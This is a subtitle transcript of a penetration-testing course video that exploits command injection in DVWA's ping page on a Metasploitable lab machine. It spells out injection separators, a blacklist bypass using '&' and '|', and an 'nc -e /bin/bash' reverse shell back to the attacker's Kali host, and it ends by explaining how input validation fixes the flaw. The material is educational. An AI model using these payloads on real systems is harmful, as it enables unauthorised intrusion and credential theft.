1
00:00:00,300 --> 00:00:01,470
Lecturer: Welcome back.

2
00:00:01,470 --> 00:00:03,390
In this video we're going to cover

3
00:00:03,390 --> 00:00:05,733
command injection vulnerability.

4
00:00:06,570 --> 00:00:08,220
We already know what this is

5
00:00:08,220 --> 00:00:10,470
and we already covered some type

6
00:00:10,470 --> 00:00:13,080
of command injection in the previous video

7
00:00:13,080 --> 00:00:16,650
once we exploited the Shellshock vulnerability.

8
00:00:16,650 --> 00:00:20,700
However, now we're going to do it on the webpage itself.

9
00:00:20,700 --> 00:00:22,620
So, do you remember this example

10
00:00:22,620 --> 00:00:24,960
on the screen that we talked about?

11
00:00:24,960 --> 00:00:26,160
Say we have a website

12
00:00:26,160 --> 00:00:29,160
and that website can ping an IP address

13
00:00:29,160 --> 00:00:30,387
that will tell it to ping.

14
00:00:30,387 --> 00:00:32,460
And it will tell us whether that

15
00:00:32,460 --> 00:00:36,030
IP address is offline or online.

16
00:00:36,030 --> 00:00:38,130
Well, we are going to take a look

17
00:00:38,130 --> 00:00:40,983
at this example inside of our Metasploitable.

18
00:00:41,880 --> 00:00:45,420
So for this, you want to start your Kali Linux machine

19
00:00:45,420 --> 00:00:49,020
and your Burp Suite inside of your Kali Linux machine.

20
00:00:49,020 --> 00:00:52,140
Now, we won't be using Burp Suite in this specific video,

21
00:00:52,140 --> 00:00:54,810
but nonetheless we must have it started

22
00:00:54,810 --> 00:00:58,290
because we connected it to be the proxy to our Firefox.

23
00:00:58,290 --> 00:00:59,670
If it is not open,

24
00:00:59,670 --> 00:01:02,700
we won't be able to visit web pages.

25
00:01:02,700 --> 00:01:04,830
After that, you also want to open up

26
00:01:04,830 --> 00:01:07,410
your Metasploitable virtual machine

27
00:01:07,410 --> 00:01:08,820
and check its IP address

28
00:01:08,820 --> 00:01:12,390
and then we want to visit the command injection page

29
00:01:12,390 --> 00:01:14,433
on our Metasploitable machine.

30
00:01:15,300 --> 00:01:17,430
So go to your Firefox right here,

31
00:01:17,430 --> 00:01:20,850
type in the IP address of your Metasploitable.

32
00:01:20,850 --> 00:01:22,920
It will lead you to this official page

33
00:01:22,920 --> 00:01:25,623
where we want to go to DVWA.

34
00:01:26,550 --> 00:01:29,220
Let us log in with the credentials that they give us,

35
00:01:29,220 --> 00:01:31,020
which is admin for the username

36
00:01:31,020 --> 00:01:33,750
and password for the password.

37
00:01:33,750 --> 00:01:34,950
Click on login.

38
00:01:34,950 --> 00:01:37,020
We don't want to save these credentials,

39
00:01:37,020 --> 00:01:40,350
and we want to go to the command execution

40
00:01:40,350 --> 00:01:43,170
or otherwise known as command injection.

41
00:01:43,170 --> 00:01:44,700
But before we attack it,

42
00:01:44,700 --> 00:01:47,670
let us go to DVWA security

43
00:01:47,670 --> 00:01:49,350
and set the security to low

44
00:01:49,350 --> 00:01:50,820
because right now we can see

45
00:01:50,820 --> 00:01:54,540
down here that the security level is set to high.

46
00:01:54,540 --> 00:01:56,610
So let's go right here,

47
00:01:56,610 --> 00:01:59,640
check this arrow and click on low.

48
00:01:59,640 --> 00:02:01,140
Now so you can see everything better,

49
00:02:01,140 --> 00:02:03,900
I'm going to zoom all of this in

50
00:02:03,900 --> 00:02:06,300
and once you set the security level to be low,

51
00:02:06,300 --> 00:02:08,400
you want to click on submit.

52
00:02:08,400 --> 00:02:11,493
Great, now let's go back to our command injection.

53
00:02:12,450 --> 00:02:13,650
So as we can see,

54
00:02:13,650 --> 00:02:17,490
it tells us that we can ping an IP address for free.

55
00:02:17,490 --> 00:02:20,400
So all we need to do is enter an IP address

56
00:02:20,400 --> 00:02:22,260
and it will give us a result of

57
00:02:22,260 --> 00:02:25,020
whether it is offline or not.

58
00:02:25,020 --> 00:02:26,340
Let's give it a try.

59
00:02:26,340 --> 00:02:29,340
If I type, for example, the IP address of my router

60
00:02:29,340 --> 00:02:33,960
which is 192.168.1.1, and I click on submit,

61
00:02:33,960 --> 00:02:36,183
let us see what it will tell us.

62
00:02:37,530 --> 00:02:39,120
And here is the output.

63
00:02:39,120 --> 00:02:42,570
It seems to work and it gives correct results.

64
00:02:42,570 --> 00:02:45,390
My router is indeed up and running.

65
00:02:45,390 --> 00:02:47,220
But if you take a closer look

66
00:02:47,220 --> 00:02:50,073
at this output that we got right here,

67
00:02:51,150 --> 00:02:53,250
it seems that this is the same output

68
00:02:53,250 --> 00:02:55,680
that we get when running ping command

69
00:02:55,680 --> 00:02:57,930
inside of a terminal, right?

70
00:02:57,930 --> 00:03:00,030
So if I go to my Kali Linux machine

71
00:03:00,030 --> 00:03:02,910
and I open the terminal

72
00:03:02,910 --> 00:03:07,910
and I type the command ping 192.168.1.1

73
00:03:08,100 --> 00:03:11,010
and I only want to ping it three times,

74
00:03:11,010 --> 00:03:14,580
if I press enter, well, we pretty much

75
00:03:14,580 --> 00:03:17,430
get the same result right here.

76
00:03:17,430 --> 00:03:19,170
It will ping my router three times

77
00:03:19,170 --> 00:03:21,630
and it will give us a similar output

78
00:03:21,630 --> 00:03:24,360
to our Metasploitable page.

79
00:03:24,360 --> 00:03:25,530
What does this mean?

80
00:03:25,530 --> 00:03:27,240
Well, it most likely means that

81
00:03:27,240 --> 00:03:30,090
this webpage forwards the command to the server,

82
00:03:30,090 --> 00:03:32,730
which in our case is our Metasploitable machine,

83
00:03:32,730 --> 00:03:35,610
and then that machine executes ping command

84
00:03:35,610 --> 00:03:39,300
to determine whether that IP is up or not.

85
00:03:39,300 --> 00:03:42,270
Another cool thing that we get with this page is

86
00:03:42,270 --> 00:03:45,720
if I scroll down here, we can see "view source"

87
00:03:45,720 --> 00:03:48,480
and this is the source code to this page.

88
00:03:48,480 --> 00:03:52,050
So, we can see whether they filter the input or not.

89
00:03:52,050 --> 00:03:54,690
But let us not check source code yet.

90
00:03:54,690 --> 00:03:55,650
Let's not cheat

91
00:03:55,650 --> 00:03:58,620
and let's just try to execute command injection

92
00:03:58,620 --> 00:04:00,210
and get it to work.

93
00:04:00,210 --> 00:04:02,160
So, how are we going to do that?

94
00:04:02,160 --> 00:04:04,770
Well, we can try to execute two commands

95
00:04:04,770 --> 00:04:07,800
inside of this input bar right here.

96
00:04:07,800 --> 00:04:09,720
It does ask us for an IP,

97
00:04:09,720 --> 00:04:11,700
but we can also try to (indistinct)

98
00:04:11,700 --> 00:04:15,600
another command after we specify an IP address.

99
00:04:15,600 --> 00:04:20,600
For example, if I type 192.168.1.1

100
00:04:20,970 --> 00:04:24,870
and I type dot and comma to separate the commands,

101
00:04:24,870 --> 00:04:28,200
and after it I type ls-la,

102
00:04:28,200 --> 00:04:31,800
which stands for list all including hidden files,

103
00:04:31,800 --> 00:04:35,430
and I click on submit and it works.

104
00:04:35,430 --> 00:04:39,090
It gave us both results from the both commands back.

105
00:04:39,090 --> 00:04:42,090
It pinged the router first and after it,

106
00:04:42,090 --> 00:04:44,310
it executed the ls command.

107
00:04:44,310 --> 00:04:47,700
And we can see what files our target has.

108
00:04:47,700 --> 00:04:51,720
This means there is command injection vulnerability

109
00:04:51,720 --> 00:04:54,480
because this is something that we shouldn't be able to do.

110
00:04:54,480 --> 00:04:56,970
We shouldn't be able to execute other commands

111
00:04:56,970 --> 00:04:59,730
outside of this ping command.

112
00:04:59,730 --> 00:05:02,370
So, let us try different commands as well.

113
00:05:02,370 --> 00:05:04,830
So, let us enter the same IP address then dot

114
00:05:04,830 --> 00:05:07,950
and comma and then "whoami" for example.

115
00:05:07,950 --> 00:05:11,070
And it does give us the output of that as well.

116
00:05:11,070 --> 00:05:14,160
We are www-data.

117
00:05:14,160 --> 00:05:17,460
Okay, but how can we exploit this and gain access

118
00:05:17,460 --> 00:05:20,403
to the target with the help of this command injection?

119
00:05:21,300 --> 00:05:22,980
It's quite simple, actually.

120
00:05:22,980 --> 00:05:25,290
We can use netcat for that.

121
00:05:25,290 --> 00:05:29,130
So, if we start listener in our Kali Linux terminal,

122
00:05:29,130 --> 00:05:33,450
if I go right here and type nc-lvp,

123
00:05:33,450 --> 00:05:37,290
and then I'm going to use the good old 12345 port.

124
00:05:37,290 --> 00:05:39,130
I start my listener right here

125
00:05:40,080 --> 00:05:43,710
and I go back to this page and run the following command.

126
00:05:43,710 --> 00:05:47,400
So I type the IP address then dot and comma

127
00:05:47,400 --> 00:05:50,940
and then nc-e where I tell it that I want

128
00:05:50,940 --> 00:05:54,840
to execute /bin/bash and I afterwards

129
00:05:54,840 --> 00:05:57,750
specify the IP address of my Kali Linux machine

130
00:05:57,750 --> 00:06:00,000
which in this case is,

131
00:06:00,000 --> 00:06:01,740
let me just check it out.

132
00:06:01,740 --> 00:06:04,380
192.168.1.9.

133
00:06:04,380 --> 00:06:08,460
So I specify right here 168.1.9

134
00:06:08,460 --> 00:06:11,490
and the port is going to be 12345,

135
00:06:11,490 --> 00:06:13,470
which is the same port from our listener.

136
00:06:13,470 --> 00:06:17,520
I click on submit and if I go back to our terminal,

137
00:06:17,520 --> 00:06:19,680
we got the connection right here.

138
00:06:19,680 --> 00:06:23,340
So we exploited the command injection vulnerability.

139
00:06:23,340 --> 00:06:25,950
We can run the commands, type ls,

140
00:06:25,950 --> 00:06:28,570
go back and switch through the other directories

141
00:06:29,790 --> 00:06:32,103
and we can check out all the other files.

142
00:06:34,800 --> 00:06:35,880
Here is the password file,

143
00:06:35,880 --> 00:06:38,040
so we can also check out the passwords.

144
00:06:38,040 --> 00:06:40,170
We can check out other commands as well

145
00:06:40,170 --> 00:06:42,210
and everything works great.

146
00:06:42,210 --> 00:06:44,820
We exploited this target.

147
00:06:44,820 --> 00:06:46,710
Let us exit out of this.

148
00:06:46,710 --> 00:06:50,700
And now that we successfully exploited this vulnerability,

149
00:06:50,700 --> 00:06:54,510
we can take a look at what the source code was.

150
00:06:54,510 --> 00:06:57,430
So let's go down here, click on view source

151
00:06:58,380 --> 00:07:01,290
and if I enlarge all of this,

152
00:07:01,290 --> 00:07:03,303
so we can see it a little bit better,

153
00:07:04,410 --> 00:07:05,850
if we take a look at it,

154
00:07:05,850 --> 00:07:10,680
we will see that it didn't really filter any user input.

155
00:07:10,680 --> 00:07:14,520
They just requested the IP that the user inputs

156
00:07:14,520 --> 00:07:16,860
and they forwarded that IP address

157
00:07:16,860 --> 00:07:19,710
to the ping command right here and right here

158
00:07:19,710 --> 00:07:23,370
without any filtering whatsoever.

159
00:07:23,370 --> 00:07:26,220
That was a big, big mistake since because of this,

160
00:07:26,220 --> 00:07:29,820
we were able to gain access to the target system.

161
00:07:29,820 --> 00:07:33,060
Now, let's give it a try on a medium security level

162
00:07:33,060 --> 00:07:36,270
and let's see whether we can exploit it then.

163
00:07:36,270 --> 00:07:38,220
So I'm going to close this source code,

164
00:07:38,220 --> 00:07:42,750
go back to DBA security and change from low to medium.

165
00:07:42,750 --> 00:07:47,490
Click on submit, and now the security level is medium.

166
00:07:47,490 --> 00:07:50,100
Let's go back to the command injection.

167
00:07:50,100 --> 00:07:52,920
And now that it is on medium level, let's give it a try.

168
00:07:52,920 --> 00:07:55,800
Let's just start with the same thing that we did previously

169
00:07:55,800 --> 00:07:58,260
and try to execute the ls command.

170
00:07:58,260 --> 00:08:02,220
So if I go right here, type one 192.168.1.1

171
00:08:02,220 --> 00:08:06,213
and then dot and comma, and then for example, ls-la.

172
00:08:07,890 --> 00:08:12,060
If I click on submit, well, nothing seems to happen.

173
00:08:12,060 --> 00:08:14,670
It doesn't seem to work anymore.

174
00:08:14,670 --> 00:08:17,340
However, luckily this dot and comma

175
00:08:17,340 --> 00:08:20,610
aren't the only ways we can run two commands.

176
00:08:20,610 --> 00:08:22,290
If I go to my terminal,

177
00:08:22,290 --> 00:08:25,920
if you type for example ls; whoami

178
00:08:25,920 --> 00:08:27,630
it will execute both of these commands.

179
00:08:27,630 --> 00:08:29,370
So it'll give us the output of these commands

180
00:08:29,370 --> 00:08:31,380
and then Mr. Hacker as well.

181
00:08:31,380 --> 00:08:33,510
But you can also do it like this.

182
00:08:33,510 --> 00:08:36,450
Specify these two signs and then whoami,

183
00:08:36,450 --> 00:08:39,809
and it will do exactly the same thing.

184
00:08:39,809 --> 00:08:41,460
So let's give it a try like this.

185
00:08:41,460 --> 00:08:43,559
Maybe they filtered this character

186
00:08:43,559 --> 00:08:45,990
but they didn't filter it like this.

187
00:08:45,990 --> 00:08:50,130
If I go here and type 192.168.1.1,

188
00:08:50,130 --> 00:08:51,420
and then these two signs,

189
00:08:51,420 --> 00:08:55,380
and then for example, ls-la once again,

190
00:08:55,380 --> 00:08:59,310
click on submit and this will do the same thing.

191
00:08:59,310 --> 00:09:01,230
It will still not work.

192
00:09:01,230 --> 00:09:02,970
Okay, let's do the same thing

193
00:09:02,970 --> 00:09:07,290
but just delete one of these signs that we put right here.

194
00:09:07,290 --> 00:09:10,740
If I show you right here, copy the same command,

195
00:09:10,740 --> 00:09:14,010
paste it right here, and I remove one sign,

196
00:09:14,010 --> 00:09:17,280
it will once again execute both of these commands,

197
00:09:17,280 --> 00:09:18,870
just as two different processes.

198
00:09:18,870 --> 00:09:21,330
So it might execute one before another,

199
00:09:21,330 --> 00:09:24,000
however, it will execute both of them.

200
00:09:24,000 --> 00:09:26,250
Let us go right here and give it a try.

201
00:09:26,250 --> 00:09:31,250
192.168.1.1 and then one of these signs and then ls-la.

202
00:09:34,080 --> 00:09:37,350
Click on submit and it works.

203
00:09:37,350 --> 00:09:40,080
We get the output of both ping commands

204
00:09:40,080 --> 00:09:42,600
and the output of all of the files

205
00:09:42,600 --> 00:09:45,483
inside of the current directory on that target system.

206
00:09:46,320 --> 00:09:48,960
So, first two tries didn't work probably

207
00:09:48,960 --> 00:09:52,500
because those characters were getting filtered and blocked.

208
00:09:52,500 --> 00:09:56,283
But if we specified like this here,

209
00:09:57,390 --> 00:09:59,340
then it seems to work.

210
00:09:59,340 --> 00:10:01,770
It seems to bypass any security

211
00:10:01,770 --> 00:10:04,530
and it executes our second command.

212
00:10:04,530 --> 00:10:07,653
So if I go down here and we take a look at the source code,

213
00:10:09,210 --> 00:10:12,510
I enlarge this so we can see the entire code,

214
00:10:12,510 --> 00:10:14,820
it seems that they created some type

215
00:10:14,820 --> 00:10:16,650
of a blacklist right here.

216
00:10:16,650 --> 00:10:18,990
So they removed these characters

217
00:10:18,990 --> 00:10:20,940
and this character right here.

218
00:10:20,940 --> 00:10:22,800
So anyone that tries to specify

219
00:10:22,800 --> 00:10:24,660
and command injection with these characters,

220
00:10:24,660 --> 00:10:26,040
it will not work.

221
00:10:26,040 --> 00:10:28,380
That's why this is medium security level

222
00:10:28,380 --> 00:10:30,540
and you need to go through a few more commands

223
00:10:30,540 --> 00:10:32,490
in order to bypass this.

224
00:10:32,490 --> 00:10:34,020
However, it is still bad

225
00:10:34,020 --> 00:10:36,060
because they filter some characters out

226
00:10:36,060 --> 00:10:38,730
but others they don't filter at all.

227
00:10:38,730 --> 00:10:42,870
For example, besides this one character that we used,

228
00:10:42,870 --> 00:10:46,380
we can also exploit it using the pipe character.

229
00:10:46,380 --> 00:10:48,900
So I can type 192.168.1.1,

230
00:10:48,900 --> 00:10:51,900
and then the pipe, which is this upper line,

231
00:10:51,900 --> 00:10:55,260
and then after it I specify ls-la.

232
00:10:55,260 --> 00:10:56,640
And this will work as well.

233
00:10:56,640 --> 00:11:01,260
As we can see, we get the output of ls-la command.

234
00:11:01,260 --> 00:11:04,980
Great. Now, if we were to change the security level to high,

235
00:11:04,980 --> 00:11:07,770
I think I read somewhere that high is an example

236
00:11:07,770 --> 00:11:09,720
of how the code should be written

237
00:11:09,720 --> 00:11:12,060
so it isn't really exploitable.

238
00:11:12,060 --> 00:11:14,400
You can change it right here, you can submit.

239
00:11:14,400 --> 00:11:16,770
And you can go to the command execution

240
00:11:16,770 --> 00:11:19,293
and check out the source code right here.

241
00:11:20,730 --> 00:11:22,890
It seems to only require the integers

242
00:11:22,890 --> 00:11:25,740
and it checks whether all of your inputs are integers

243
00:11:25,740 --> 00:11:28,923
and it splits the IP address into four octets.

244
00:11:30,240 --> 00:11:32,073
It does that first, it splits it right here.

245
00:11:32,073 --> 00:11:34,920
Then it checks if every octet is an integer,

246
00:11:34,920 --> 00:11:36,540
and if it is an integer,

247
00:11:36,540 --> 00:11:40,050
then it combines those octets once again back

248
00:11:40,050 --> 00:11:42,333
and it pings that target.

249
00:11:43,170 --> 00:11:46,230
Okay, so we have covered command injection vulnerability

250
00:11:46,230 --> 00:11:50,160
and now you know how to try to find it and exploit it.

251
00:11:50,160 --> 00:11:51,150
In the next video,

252
00:11:51,150 --> 00:11:54,480
we're going to move on to the next vulnerability.

253
00:11:54,480 --> 00:11:55,313
See you there.